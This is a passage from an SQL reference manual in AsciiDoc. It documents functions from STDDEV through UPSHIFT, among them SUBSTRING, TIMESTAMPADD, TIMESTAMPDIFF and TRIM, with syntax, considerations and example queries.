See <<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\n[[examples_of_sqrt]]\r\n=== Examples of SQRT\r\n\r\n* This function returns the value 5.19615242270663232e+000, or\r\napproximately 5.196:\r\n+\r\n```\r\nSQRT(27)\r\n```\r\n\r\n<<<\r\n[[stddev_function]]\r\n== STDDEV Function\r\n\r\nSTDDEV is an aggregate function that returns the standard deviation of a\r\nset of numbers. STDDEV is a {project-name} SQL extension.\r\n\r\n```\r\nSTDDEV ([ALL | DISTINCT] expression [, weight])\r\n```\r\n\r\n* `ALL | DISTINCT`\r\n+\r\nspecifies whether duplicate values are included in the computation of\r\nthe STDDEV of the _expression_. The default option is ALL, which\r\ncauses duplicate values to be included. If you specify DISTINCT,\r\nduplicate values are eliminated before the STDDEV function is applied.\r\nIf DISTINCT is specified, you cannot specify _weight_.\r\n\r\n* `_expression_`\r\n+\r\nspecifies a numeric value expression that determines the values for\r\nwhich to compute the standard deviation. The _expression_ cannot contain\r\nan aggregate function or a subquery. The DISTINCT clause specifies that\r\nthe STDDEV function operates on distinct values from the one-column\r\ntable derived from the evaluation of _expression_.\r\n\r\n* `_weight_`\r\n+\r\nspecifies a numeric value expression that determines the weights of the\r\nvalues for which to compute the standard deviation. _weight_ cannot\r\ncontain an aggregate function or a subquery. _weight_ is defined on\r\nthe same table as _expression_. The one-column table derived from the\r\nevaluation of _expression_ and the one-column table derived from the\r\nevaluation of _weight_ must have the same cardinality.\r\n\r\n[[considerations_for_stddev]]\r\n=== Considerations for STDDEV\r\n\r\n[[definition_of_stddev]]\r\n==== Definition of STDDEV\r\n\r\nThe standard deviation of a value expression is defined to be the square\r\nroot of the variance of the expression.\r\nSee <<variance_function,VARIANCE Function>>.\r\n\r\nBecause the definition of variance has _N-1_ in the denominator of the\r\nexpression (if weight is not specified), {project-name} SQL returns a\r\nsystem-defined default setting of zero (and no error) if the number of\r\nrows in the table, or a group of the table, is equal to 1.\r\n\r\n[[data_type_of_the_result]]\r\n==== Data Type of the Result\r\n\r\nThe data type of the result is always DOUBLE PRECISION.\r\n\r\n[[operands_of_the_expression]]\r\n==== Operands of the Expression\r\n\r\nThe expression includes columns from the rows of the SELECT result table\r\nbut cannot include an aggregate function. These are valid:\r\n\r\n```\r\nSTDDEV (SALARY)\r\nSTDDEV (SALARY * 1.1)\r\nSTDDEV (PARTCOST * QTY_ORDERED)\r\n```\r\n\r\n[[stddev_nulls]]\r\n==== Nulls\r\n\r\nSTDDEV is evaluated after eliminating all nulls from the set. If the\r\nresult table is empty, STDDEV returns NULL.\r\n\r\n[[float54_and_double_precision_data]]\r\n==== FLOAT(54) and DOUBLE PRECISION Data\r\n\r\nAvoid using large FLOAT(54) or DOUBLE PRECISION values as arguments to\r\nSTDDEV. 
If SUM(x * x) exceeds the value of 1.15792089237316192e77 during the computation\r\nof STDDEV(x), a numeric overflow occurs.\r\n\r\n<<<\r\n[[examples_of_stddev]]\r\n=== Examples of STDDEV\r\n\r\n* Compute the standard deviation of the salary of the current employees:\r\n+\r\n```\r\nSELECT STDDEV(salary) AS StdDev_Salary FROM persnl.employee;\r\n\r\nSTDDEV_SALARY\r\n-------------------------\r\n 3.57174062500000000E+004\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n* Compute the standard deviation of the cost of parts in the current\r\ninventory:\r\n+\r\n```\r\nSELECT STDDEV (price * qty_available) FROM sales.parts;\r\n\r\n(EXPR)\r\n-------------------------\r\n 7.13899499999999808E+006\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[substring_function]]\r\n== SUBSTRING\/SUBSTR Function\r\n\r\nThe SUBSTRING function extracts a substring out of a given character\r\nexpression. It returns a character string of data type VARCHAR, with a\r\nmaximum length equal to the smaller of these two:\r\n\r\n\r\n* The fixed length of the input string (for CHAR-type strings) or the\r\nmaximum variable length (for VARCHAR-type strings)\r\n* The value of the length argument (when a constant is specified) or\r\n32708 (when a non-constant is specified)\r\n\r\nSUBSTR is equivalent to SUBSTRING.\r\n\r\n```\r\nSUBSTRING (character-expr FROM start-position [FOR length])\r\n```\r\n\r\nor:\r\n\r\n```\r\nSUBSTRING (character-expr, start-position [, length])\r\n```\r\n\r\n* `_character-expr_`\r\n+\r\nspecifies the source string from which to extract the substring. The\r\nsource string is an SQL character value expression. The operand is the\r\nresult of evaluating _character-expr_. See\r\n<<character_value_expressions,Character Value Expressions>>.\r\n\r\n* `_start-position_`\r\n+\r\nspecifies the starting position _start-position_ within _character-expr_\r\nat which to start extracting the substring. _start-position_ must be a\r\nvalue with an exact numeric data type and a scale of zero.\r\n\r\n* `_length_`\r\n+\r\nspecifies the number of characters to extract from _character-expr_.\r\nKeep in mind that every character, including multi-byte characters,\r\ncounts as one character. _length_ is the length of the extracted\r\nsubstring and must be a value greater than or equal to zero of exact\r\nnumeric data type and with a scale of zero.\r\n+\r\nThe _length_ field is optional. If you do not specify it, all characters\r\nstarting at _start-position_ and continuing until the end of\r\n_character-expr_ are returned.\r\n\r\n[[alternative_forms]]\r\n=== Alternative Forms\r\n\r\n* The SUBSTRING function treats SUBSTRING( _string_ FOR _int_ ) as\r\nequivalent to SUBSTRING( _string_ FROM 1 FOR _int_ ). The {project-name}\r\ndatabase software already supports the ANSI standard form as:\r\n+\r\n```\r\nSUBSTRING(string FROM int [ FOR int ])\r\n```\r\n\r\n* The SUBSTRING function treats SUBSTRING (_string_, _Fromint_) as\r\nequivalent to SUBSTRING(_string_ FROM _Fromint_). 
The {project-name}\r\ndatabase software already supports SUBSTRING (_string_, _Fromint_,\r\n_Forint_) as equivalent to the ANSI standard form:\r\n+\r\n```\r\nSUBSTRING(string FROM Fromint FOR Forint)\r\n```\r\n\r\n[[considerations_for_substring]]\r\n=== Considerations for SUBSTRING\/SUBSTR\r\n\r\n[[requirements_for_the_expression_length_and_start_position]]\r\n==== Requirements for the Expression, Length, and Start Position\r\n\r\n* The data types of the substring length and the start position must be\r\nnumeric with a scale of zero. Otherwise, an error is returned.\r\n* If the sum of the start position and the substring length is greater\r\nthan the length of the character expression, the substring from the\r\nstart position to the end of the string is returned.\r\n* If the start position is greater than the length of the character\r\nexpression, an empty string ('') is returned.\r\n* If the start position is zero or negative, counting still begins at\r\nthat logical position, so only the characters that actually fall within\r\n_character-expr_ are returned (see the FROM -2 FOR 5 example below).\r\n* The resulting substring is always of type VARCHAR. If the source\r\ncharacter string is an up-shifted CHAR or VARCHAR string, the result is\r\nan up-shifted VARCHAR type.\r\n\r\n<<<\r\n[[examples_of_substring]]\r\n=== Examples of SUBSTRING\/SUBSTR\r\n\r\n* Extract 'Ro':\r\n+\r\n```\r\nSUBSTRING('Robert John Smith' FROM 0 FOR 3)\r\nSUBSTR('Robert John Smith' FROM 0 FOR 3)\r\n```\r\n\r\n* Extract 'John':\r\n+\r\n```\r\nSUBSTRING ('Robert John Smith' FROM 8 FOR 4)\r\nSUBSTR ('Robert John Smith' FROM 8 FOR 4)\r\n```\r\n\r\n* Extract 'John Smith':\r\n+\r\n```\r\nSUBSTRING ('Robert John Smith' FROM 8)\r\nSUBSTR ('Robert John Smith' FROM 8)\r\n```\r\n\r\n* Extract 'Robert John Smith':\r\n+\r\n```\r\nSUBSTRING ('Robert John Smith' FROM 1 FOR 17)\r\nSUBSTR ('Robert John Smith' FROM 1 FOR 17)\r\n```\r\n\r\n* Extract 'John Smith':\r\n+\r\n```\r\nSUBSTRING ('Robert John Smith' FROM 8 FOR 15)\r\nSUBSTR ('Robert John Smith' FROM 8 FOR 15)\r\n```\r\n\r\n* Extract 'Ro':\r\n+\r\n```\r\nSUBSTRING ('Robert John Smith' FROM -2 FOR 5)\r\nSUBSTR ('Robert John Smith' FROM -2 FOR 5)\r\n```\r\n\r\n* Extract an empty string '':\r\n+\r\n```\r\nSUBSTRING ('Robert John Smith' FROM 8 FOR 0)\r\nSUBSTR ('Robert John Smith' FROM 8 FOR 0)\r\n```\r\n\r\n<<<\r\n[[sum_function]]\r\n== SUM Function\r\n\r\nSUM is an aggregate function that returns the sum of a set of numbers.\r\n\r\n```\r\nSUM ([ALL | DISTINCT] expression)\r\n```\r\n\r\n* `ALL | DISTINCT`\r\n+\r\nspecifies whether duplicate values are included in the computation of\r\nthe SUM of the _expression_. The default option is ALL, which causes\r\nduplicate values to be included. If you specify DISTINCT, duplicate\r\nvalues are eliminated before the SUM function is applied.\r\n\r\n* `_expression_`\r\n+\r\nspecifies a numeric or interval value expression that determines the\r\nvalues to sum. The _expression_ cannot contain an aggregate function or\r\na subquery. The DISTINCT clause specifies that the SUM function operates\r\non distinct values from the one-column table derived from the evaluation\r\nof _expression_. All nulls are eliminated before the function is\r\napplied to the set of values. If the result table is empty, SUM returns\r\nNULL. See <<expressions,Expressions>>.\r\n\r\n[[considerations_for_sum]]\r\n=== Considerations for SUM\r\n\r\n[[data_type_and_scale_of_the_result]]\r\n==== Data Type and Scale of the Result\r\n\r\nThe data type of the result depends on the data type of the argument. If\r\nthe argument is an exact numeric type, the result is LARGEINT. If the\r\nargument is an approximate numeric type, the result\r\nis DOUBLE PRECISION. 
If the argument is INTERVAL data type, the result\r\nis INTERVAL with the same precision as the argument. The scale of the\r\nresult is the same as the scale of the argument. If the argument has no\r\nscale, the result is truncated.\r\n\r\n[[operands_of_the_expression]]\r\n==== Operands of the Expression\r\n\r\nThe expression includes columns from the rows of the SELECT result\r\ntable but cannot include an aggregate function. The valid expressions\r\nare:\r\n\r\n```\r\nSUM (SALARY)\r\nSUM (SALARY * 1.1)\r\nSUM (PARTCOST * QTY_ORDERED)\r\n```\r\n\r\n[[examples_of_sum]]\r\n=== Examples of SUM\r\n\r\n* Compute the total value of parts in the current inventory:\r\n+\r\n```\r\nSELECT SUM (price * qty_available) FROM sales.parts;\r\n\r\n(EXPR)\r\n---------------------\r\n 117683505.96\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n
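* Compute the total salary for each department (a sketch, not from the\r\noriginal manual; it assumes the sample _employee_ table includes a\r\n_deptnum_ grouping column):\r\n+\r\n```\r\nSELECT deptnum, SUM(salary)\r\nFROM persnl.employee\r\nGROUP BY deptnum;\r\n```\r\n+\r\nBecause the select list mixes a grouping column with an aggregate, the\r\nGROUP BY clause is required.\r\n\r\n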
<<<\r\n[[tan_function]]\r\n== TAN Function\r\n\r\nThe TAN function returns the tangent of a numeric value expression,\r\nwhere the expression is an angle expressed in radians.\r\n\r\nTAN is a {project-name} SQL extension.\r\n\r\n```\r\nTAN (numeric-expression)\r\n```\r\n\r\n* `_numeric-expression_`\r\n+\r\nis an SQL numeric value expression that specifies the value for the\r\nargument of the TAN function.\r\nSee <<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\n[[examples_of_tan]]\r\n=== Examples of TAN\r\n\r\n* This function returns the value 3.64008908293626880E-001, or\r\napproximately 0.3640, the tangent of 0.3491 (which is 20 degrees):\r\n+\r\n```\r\nTAN (0.3491)\r\n```\r\n\r\n<<<\r\n[[tanh_function]]\r\n== TANH Function\r\n\r\nThe TANH function returns the hyperbolic tangent of a numeric value\r\nexpression, where the expression is an angle expressed in radians.\r\n\r\nTANH is a {project-name} SQL extension.\r\n\r\n```\r\nTANH (numeric-expression)\r\n```\r\n\r\n* `_numeric-expression_`\r\n+\r\nis an SQL numeric value expression that specifies the value for the\r\nargument of the TANH function.\r\nSee <<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\n[[examples_of_tanh]]\r\n=== Examples of TANH\r\n\r\n* This function returns the value 8.48283639957512960E-001 or\r\napproximately 0.8483, the hyperbolic tangent of 1.25:\r\n+\r\n```\r\nTANH (1.25)\r\n```\r\n\r\n<<<\r\n[[this_function]]\r\n== THIS Function\r\n\r\nThe THIS function is a sequence function that is used in the ROWS SINCE\r\nfunction to distinguish between the value of the column in the current\r\nrow and the value of the column in previous rows (in an intermediate\r\nresult table ordered by a SEQUENCE BY clause in a SELECT statement).\r\nSee <<rows_since_function,ROWS SINCE Function>>.\r\n\r\nTHIS is a {project-name} SQL extension.\r\n\r\n```\r\nTHIS (column-expression)\r\n```\r\n\r\n* `_column-expression_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression. If the value of the expression is null, THIS returns null.\r\n\r\n[[considerations_for_this]]\r\n=== Considerations for THIS\r\n\r\n[[counting_the_rows]]\r\n==== Counting the Rows\r\n\r\nYou can use the THIS function only within the ROWS SINCE function. For\r\neach row, the ROWS SINCE condition is evaluated in two steps:\r\n\r\n\r\n1. The expression for THIS is evaluated for the current row. This value\r\nbecomes a constant.\r\n2. The condition is evaluated for the result table, using a combination\r\nof the THIS constant and the data for each row in the result table,\r\nstarting with the previous row as row 1 (up to the maximum number of\r\nrows or the size of the result table).\r\n\r\n\r\nIf a row is reached where the condition is true, ROWS SINCE returns the\r\nnumber of rows counted so far. Otherwise, if the condition is never true\r\nwithin the result table being considered, ROWS SINCE returns null.\r\n{project-name} SQL then goes to the next row as the new current row and the\r\nTHIS constant is reevaluated.\r\n\r\n<<<\r\n[[examples_of_this]]\r\n=== Examples of THIS\r\n\r\n* Return the number of rows since the current value of _i1_ became less\r\nthan the value of _i1_ in a previous row:\r\n+\r\n```\r\nSELECT ROWS SINCE (THIS(i1) < i1) AS rows_since_this\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\nrows_since_this\r\n---------------\r\n ?\r\n ?\r\n 1\r\n 1\r\n ?\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[timestampadd_function]]\r\n== TIMESTAMPADD Function\r\n\r\nThe TIMESTAMPADD function adds the interval of time specified by\r\n_interval-ind_ and _num_expr_ to _datetime_expr_. If the specified\r\ninterval is in years, months, or quarters and the resulting date is not\r\na valid date, the day will be rounded down to the last day of the result\r\nmonth. The type of the _datetime_expr_ is returned except when the\r\n_interval-ind_ contains any time component, in which case a TIMESTAMP is\r\nreturned.\r\n\r\nTIMESTAMPADD is a {project-name} SQL extension.\r\n\r\n```\r\nTIMESTAMPADD (interval-ind, num-expr, datetime-expr)\r\n```\r\n\r\n* `_interval-ind_`\r\n+\r\nis SQL_TSI_YEAR, SQL_TSI_MONTH, SQL_TSI_DAY, SQL_TSI_HOUR,\r\nSQL_TSI_MINUTE, SQL_TSI_SECOND, SQL_TSI_QUARTER, or SQL_TSI_WEEK.\r\n\r\n* `_num_expr_`\r\n+\r\nis an SQL exact numeric value expression that specifies how many\r\n_interval-ind_ units of time are to be added to _datetime_expr_. If\r\n_num_expr_ has a fractional portion, it is ignored. If _num_expr_ is\r\nnegative, the return value precedes _datetime_expr_ by the specified\r\namount of time.\r\n\r\n* `_datetime_expr_`\r\n+\r\nis an expression that evaluates to a datetime value of type DATE or\r\nTIMESTAMP. 
The type of the _datetime_expr_ is returned except when the\r\n_interval-ind_ contains any time component, in which case a TIMESTAMP is\r\nreturned.\r\n\r\n<<<\r\n[[examples_of_timestampadd]]\r\n=== Examples of TIMESTAMPADD\r\n\r\n* This function adds seven days to the date specified in _start-date_:\r\n+\r\n```\r\nTIMESTAMPADD (SQL_TSI_DAY, 7, start-date)\r\n```\r\n\r\n* This function returns the value DATE '2008-03-06':\r\n+\r\n```\r\nTIMESTAMPADD (SQL_TSI_WEEK, 1, DATE '2008-02-28')\r\n```\r\n\r\n* This function returns the value DATE '1999-02-28':\r\n+\r\n```\r\nTIMESTAMPADD (SQL_TSI_YEAR, -1, DATE '2000-02-29')\r\n```\r\n\r\n* This function returns the value TIMESTAMP '2003-02-28 13:27:35':\r\n+\r\n```\r\nTIMESTAMPADD (SQL_TSI_MONTH, -12, TIMESTAMP '2004-02-29 13:27:35')\r\n```\r\n\r\n* This function returns the value TIMESTAMP '2004-02-28 13:27:35':\r\n+\r\n```\r\nTIMESTAMPADD (SQL_TSI_MONTH, 12, TIMESTAMP '2003-02-28 13:27:35')\r\n```\r\n\r\n* This function returns the value DATE '2008-06-30':\r\n+\r\n```\r\nTIMESTAMPADD (SQL_TSI_QUARTER, -2, DATE '2008-12-31')\r\n```\r\n\r\n* This function returns the value TIMESTAMP '2008-06-30 23:59:55':\r\n+\r\n```\r\nTIMESTAMPADD (SQL_TSI_SECOND, -5, DATE '2008-07-01')\r\n```\r\n\r\n<<<\r\n[[timestampdiff_function]]\r\n== TIMESTAMPDIFF Function\r\n\r\nThe TIMESTAMPDIFF function returns the integer value for the number of\r\n_interval-ind_ units of time between _startdate_ and _enddate_. If\r\n_enddate_ precedes _startdate_, the return value is negative or zero.\r\n\r\n```\r\nTIMESTAMPDIFF (interval-ind, startdate, enddate)\r\n```\r\n\r\n* `_interval-ind_`\r\n+\r\nis SQL_TSI_YEAR, SQL_TSI_MONTH, SQL_TSI_DAY, SQL_TSI_HOUR,\r\nSQL_TSI_MINUTE, SQL_TSI_SECOND, SQL_TSI_QUARTER, or SQL_TSI_WEEK.\r\n\r\n* `_startdate_` and `_enddate_`\r\n+\r\nare each of type DATE or TIMESTAMP.\r\n\r\nThe method of counting crossed boundaries such as days, minutes, and\r\nseconds makes the result given by TIMESTAMPDIFF consistent across all\r\ndata types. The TIMESTAMPDIFF function makes these boundary assumptions:\r\n\r\n* A year begins at the start of January 1.\r\n* A new quarter begins on January 1, April 1, July 1, and October 1.\r\n* A week begins at the start of Sunday.\r\n* A day begins at midnight.\r\n\r\nThe result is a signed integer value equal to the number of\r\n_interval-ind_ boundaries crossed between the first and second date. For\r\nexample, the number of weeks between Sunday, January 4, and Sunday,\r\nJanuary 11, is 1. The number of months between March 31 and April 1 would\r\nbe 1 because the month boundary is crossed from March to April.\r\n\r\nThe TIMESTAMPDIFF function generates an error if the result is out of\r\nrange for integer values. For seconds, the maximum number is equivalent\r\nto approximately 68 years. 
The TIMESTAMPDIFF function generates an error\r\nif a difference in weeks is requested and one of the two dates precedes\r\nJanuary 7 of the year 0001.\r\n\r\n<<<\r\n[[examples_of_timestampdiff]]\r\n=== Examples of TIMESTAMPDIFF\r\n\r\n* This function returns the value 1 because a 1-second boundary is\r\ncrossed even though the two timestamps differ by only one microsecond:\r\n+\r\n```\r\nTIMESTAMPDIFF\r\n(\r\n SQL_TSI_SECOND\r\n, TIMESTAMP '2006-09-12 11:59:58.999999'\r\n, TIMESTAMP '2006-09-12 11:59:59.000000'\r\n)\r\n```\r\n\r\n* This function returns the value 0 because no year boundaries are\r\ncrossed:\r\n+\r\n```\r\nTIMESTAMPDIFF\r\n( SQL_TSI_YEAR\r\n, TIMESTAMP '2006-12-31 23:59:59.000000'\r\n, TIMESTAMP '2006-12-31 23:59:59.999999'\r\n)\r\n```\r\n\r\n* This function returns the value 1 because a year boundary is crossed:\r\n+\r\n```\r\nTIMESTAMPDIFF\r\n( SQL_TSI_YEAR\r\n, TIMESTAMP '2006-12-31 23:59:59.999999'\r\n, TIMESTAMP '2007-01-01 00:00:00.000000'\r\n)\r\n```\r\n\r\n* This function returns the value 1 because a WEEK boundary is crossed:\r\n+\r\n```\r\nTIMESTAMPDIFF (SQL_TSI_WEEK, DATE '2006-01-01', DATE '2006-01-09')\r\n```\r\n\r\n* This function returns the value -29:\r\n+\r\n```\r\nTIMESTAMPDIFF (SQL_TSI_DAY, DATE '2004-03-01', DATE '2004-02-01')\r\n```\r\n\r\n<<<\r\n[[translate_function]]\r\n== TRANSLATE Function\r\n\r\nThe TRANSLATE function translates a character string from a source\r\ncharacter set to a target character set. The TRANSLATE function changes\r\nboth the character string data type and the character set encoding of\r\nthe string.\r\n\r\n```\r\nTRANSLATE(character-value-expression USING translation-name)\r\n```\r\n\r\n* `_character-value-expression_`\r\n+\r\nis a character string.\r\n\r\n* `_translation-name_`\r\n+\r\nis one of these translation names:\r\n+\r\n[cols=\"25%l,25%l,25%l,25%\",options=\"header\"]\r\n|===\r\n| Translation Name | Source Character Set | Target Character Set | Comments\r\n| ISO88591TOUTF8 | ISO88591 | UTF8 | Translates ISO8859-1 characters to UTF8 characters. No data loss is possible.\r\n| UTF8TOISO88591 | UTF8 | ISO88591 | Translates UTF8 characters to ISO88591 characters. {project-name} SQL will\r\ndisplay an error if it encounters a Unicode character that cannot be converted to the target character set.\r\n|===\r\n\r\n_translation-name_ identifies the translation and the source and target\r\ncharacter sets. When you translate to the UTF8 character set, no data\r\nloss is possible. However, when {project-name} SQL translates a\r\n_character-value-expression_ from UTF8, it may be that certain\r\ncharacters cannot be converted to the target character set. {project-name}\r\nSQL reports an error in this case.\r\n\r\n{project-name} SQL returns a variable-length character string with character\r\nrepertoire equal to the character repertoire of the target character set\r\nof the translation and the maximum length equal to the fixed length or\r\nmaximum variable length of the source _character-value-expression_.\r\n\r\nIf you enter an illegal _translation-name_, {project-name} SQL returns an\r\nerror.\r\n\r\nIf the character set for _character-value-expression_ is different from\r\nthe source character set as specified in the _translation-name_,\r\n{project-name} SQL returns an error.\r\n\r\n
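[[examples_of_translate]]\r\n=== Examples of TRANSLATE\r\n\r\n* Translate a column value from the ISO88591 character set to UTF8 (a\r\nsketch, not from the original manual; it assumes the _custname_ column is\r\ndeclared with the ISO88591 character set):\r\n+\r\n```\r\nSELECT TRANSLATE(custname USING ISO88591TOUTF8)\r\nFROM sales.customer;\r\n```\r\n+\r\nThe result is a VARCHAR value in the UTF8 character set; because the\r\ntarget is UTF8, no data loss is possible.\r\n\r\n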
<<<\r\n[[trim_function]]\r\n== TRIM Function\r\n\r\nThe TRIM function removes leading and trailing characters from a\r\ncharacter string. Every character, including multi-byte characters, is\r\ntreated as one character.\r\n\r\n```\r\nTRIM ([[trim-type] [trim-char] FROM] trim-source)\r\n```\r\n\r\n* `_trim-type_` is:\r\n+\r\n```\r\nLEADING | TRAILING | BOTH\r\n```\r\n\r\n* `_trim-type_`\r\n+\r\nspecifies whether characters are to be trimmed from the leading end\r\n(LEADING), trailing end (TRAILING), or both ends (BOTH) of\r\n_trim-source_. If you omit _trim-type_, the default is BOTH.\r\n\r\n* `_trim-char_`\r\n+\r\nis an SQL character value expression and specifies the character to be\r\ntrimmed from _trim-source_. _trim-char_ has a maximum length of 1. If you omit\r\n_trim-char_, SQL trims blanks (' ') from _trim-source_.\r\n\r\n* `_trim-source_`\r\n+\r\nis an SQL character value expression and specifies the string from which\r\nto trim characters. See <<character_value_expressions,Character Value Expressions>>.\r\n\r\n[[considerations_for_trim]]\r\n=== Considerations for TRIM\r\n\r\n[[result_of_trim]]\r\n==== Result of TRIM\r\n\r\nThe result is always of type VARCHAR, with maximum length equal to the\r\nfixed length or maximum variable length of _trim-source_. If the\r\nsource character string is an up-shifted CHAR or VARCHAR string, the\r\nresult is an up-shifted VARCHAR type.\r\n\r\n<<<\r\n[[examples_of_trim]]\r\n=== Examples of TRIM\r\n\r\n* Return 'Robert':\r\n+\r\n```\r\nTRIM(' Robert ')\r\n```\r\n\r\n* The EMPLOYEE table defines FIRST_NAME as CHAR(15) and LAST_NAME as\r\nCHAR(20). This expression uses the TRIM function to return the value\r\n'Robert Smith' without extra blanks:\r\n+\r\n```\r\nTRIM(first_name) || ' ' || TRIM (last_name)\r\n```\r\n\r\n
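* Remove leading zeros by specifying both _trim-type_ and _trim-char_\r\n(a sketch of this form; the result is '12345'):\r\n+\r\n```\r\nTRIM(LEADING '0' FROM '00012345')\r\n```\r\n\r\n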
<<<\r\n[[ucase_function]]\r\n== UCASE Function\r\n\r\nThe UCASE function up-shifts alphanumeric characters. For\r\nnon-alphanumeric characters, UCASE returns the same character. UCASE can\r\nappear anywhere in a query where a value can be used, such as in a\r\nselect list, an ON clause, a WHERE clause, a HAVING clause, a LIKE\r\npredicate, an expression, or as qualifying a new value in an UPDATE or\r\nINSERT statement. The result returned by the UCASE function is equal to\r\nthe result returned by the <<upper_function,UPPER Function>>\r\nor <<upshift_function,UPSHIFT Function>>.\r\n\r\nUCASE returns a string of fixed-length or variable-length character\r\ndata, depending on the data type of the input string.\r\n\r\nUCASE is a {project-name} SQL extension.\r\n\r\n```\r\nUCASE (character-expression)\r\n```\r\n\r\n* `_character-expression_`\r\n+\r\nis an SQL character value expression that specifies a string of\r\ncharacters to upshift. See <<character_value_expressions,Character Value Expressions>>.\r\n\r\n[[considerations_for_ucase]]\r\n=== Considerations for UCASE\r\n\r\nFor a UTF8 _character-expression_, the UCASE function up-shifts all\r\nlowercase or title case characters to uppercase and returns a character\r\nstring. If the argument is of type CHAR(_n_) or VARCHAR(_n_), the\r\nresult is of type VARCHAR(min(3_n_, 2048)); that is, the maximum length\r\nof the result is the smaller of 3_n_ and 2048.\r\n\r\nA lowercase character is a character that has the \"alphabetic\" property\r\nin Unicode Standard 2 and whose Unicode name includes _lower_. An\r\nuppercase character is a character that has the \"alphabetic\" property\r\nand whose Unicode name includes _upper_. A title case character is a\r\ncharacter that has the Unicode \"alphabetic\" property and whose Unicode\r\nname includes _title_.\r\n\r\n<<<\r\n[[examples_of_ucase]]\r\n=== Examples of UCASE\r\n\r\n* Suppose that your CUSTOMER table includes an entry for Hotel Oregon.\r\nSelect the column CUSTNAME and return it in uppercase and lowercase letters\r\nby using the UCASE and LCASE functions:\r\n+\r\n```\r\nSELECT custname,UCASE(custname),LCASE(custname) FROM sales.customer;\r\n\r\n(EXPR) (EXPR) (EXPR)\r\n----------------- ------------------- ------------------\r\n... ... ...\r\nHotel Oregon HOTEL OREGON hotel oregon\r\n\r\n--- 17 row(s) selected.\r\n```\r\n+\r\nSee <<lcase_function,LCASE Function>>.\r\n\r\n<<<\r\n[[upper_function]]\r\n== UPPER Function\r\n\r\nThe UPPER function up-shifts alphanumeric characters. For\r\nnon-alphanumeric characters, UPPER returns the same character. UPPER can\r\nappear anywhere in a query where a value can be used, such as in a\r\nselect list, an ON clause, a WHERE clause, a HAVING clause, a LIKE\r\npredicate, an expression, or as qualifying a new value in an UPDATE or\r\nINSERT statement. The result returned by the UPPER function is equal to\r\nthe result returned by the <<upshift_function,UPSHIFT Function>> or <<ucase_function,UCASE Function>>.\r\n\r\nUPPER returns a string of fixed-length or variable-length character\r\ndata, depending on the data type of the input string.\r\n\r\n```\r\nUPPER (character-expression)\r\n```\r\n\r\n* `_character-expression_`\r\n+\r\nis an SQL character value expression that specifies a string of\r\ncharacters to upshift.\r\nSee <<character_value_expressions,Character Value Expressions>>.\r\n\r\n[[examples_of_upper]]\r\n=== Examples of UPPER\r\n\r\n* Suppose that your CUSTOMER table includes an entry for Hotel Oregon.\r\nSelect the column CUSTNAME and return it in uppercase and lowercase letters\r\nby using the UPPER and LOWER functions:\r\n+\r\n```\r\nSELECT custname,UPPER(custname),LOWER(custname) FROM sales.customer;\r\n\r\n(EXPR) (EXPR) (EXPR)\r\n----------------- ------------------- ------------------\r\n... ... ...\r\nHotel Oregon HOTEL OREGON hotel oregon\r\n\r\n--- 17 row(s) selected.\r\n```\r\n+\r\nSee <<lower_function,LOWER Function>>.\r\n+\r\nFor examples of when to use the UPPER function,\r\nsee <<upshift_function,UPSHIFT Function>>.\r\n\r\n<<<\r\n[[upshift_function]]\r\n== UPSHIFT Function\r\n\r\nThe UPSHIFT function up-shifts alphanumeric characters. For\r\nnon-alphanumeric characters, UPSHIFT returns the same character. UPSHIFT\r\ncan appear anywhere in a query where a value can be used, such as in a\r\nselect list, an ON clause, a WHERE clause, a HAVING clause, a LIKE\r\npredicate, an expression, or as qualifying a new value in an UPDATE or\r\nINSERT statement. The result returned by the UPSHIFT function is equal\r\nto the result returned by the <<upper_function,UPPER Function>> or\r\n<<ucase_function,UCASE Function>>.\r\n\r\nUPSHIFT returns a string of fixed-length or variable-length character\r\ndata, depending on the data type of the input string.\r\n\r\nUPSHIFT is a {project-name} SQL extension.\r\n\r\n```\r\nUPSHIFT (character-expression)\r\n```\r\n\r\n* `_character-expression_`\r\n+\r\nis an SQL character value expression that specifies a string of\r\ncharacters to upshift. 
See\r\n<<character_value_expressions,Character Value Expressions>>.\r\n\r\n[[examples_of_upshift]]\r\n=== Examples of UPSHIFT\r\n\r\n* Suppose that your CUSTOMER table includes an entry for Hotel Oregon.\r\nSelect the column CUSTNAME and return a result in uppercase letters by\r\nusing the UPSHIFT, UPPER, and UCASE functions:\r\n+\r\n```\r\nSELECT UPSHIFT(custname), UPPER(custname), UCASE(custname)\r\nFROM sales.customer;\r\n\r\n(EXPR) (EXPR) (EXPR)\r\n----------------- ------------------- ------------------\r\n... ... ...\r\nHOTEL OREGON HOTEL OREGON HOTEL OREGON\r\n\r\n--- 17 row(s) selected.\r\n```\r\n\r\n<<<\r\n* Perform a case-insensitive search for the DataSpeed customer:\r\n+\r\n```\r\nSELECT *\r\nFROM sales.customer\r\nWHERE UPSHIFT (custname) = 'DATASPEED';\r\n\r\nCUSTNAME STREET CITY ...\r\n---------- -------------------- --------- ...\r\nDataSpeed 300 SAN GABRIEL WAY NEW YORK ...\r\n\r\n--- 1 row(s) selected.\r\n```\r\n+\r\nIn the table, the name can be in lowercase, uppercase, or mixed case letters.\r\n\r\n* Suppose that your database includes two department tables: DEPT1 and\r\nDEPT2. Return all rows from the two tables in which the department names\r\nhave the same value regardless of case:\r\n+\r\n```\r\nSELECT *\r\nFROM persnl.dept1 D1, persnl.dept2 D2\r\nWHERE UPSHIFT(D1.deptname) = UPSHIFT(D2.deptname);\r\n```\r\n\r\n<<<\r\n[[user_function]]\r\n== USER Function\r\n\r\nThe USER function returns either the database user name associated with\r\nthe specified user ID number or the database user name of the current\r\nuser who invoked the function. The current user is the authenticated\r\nuser who started the session. That database user name is used for\r\nauthorization of SQL statements in the current session.\r\n\r\n```\r\nUSER [(user-id)]\r\n```\r\n\r\n* `_user-id_`\r\n+\r\nis the 32-bit number associated with a database user name.\r\n+\r\nThe USER function is similar to the <<authname_function,AUTHNAME Function>>\r\nand the <<current_user_function,CURRENT USER Function>>.\r\n\r\n[[considerations_for_user]]\r\n=== Considerations for USER\r\n\r\n* This function can be specified only in the top 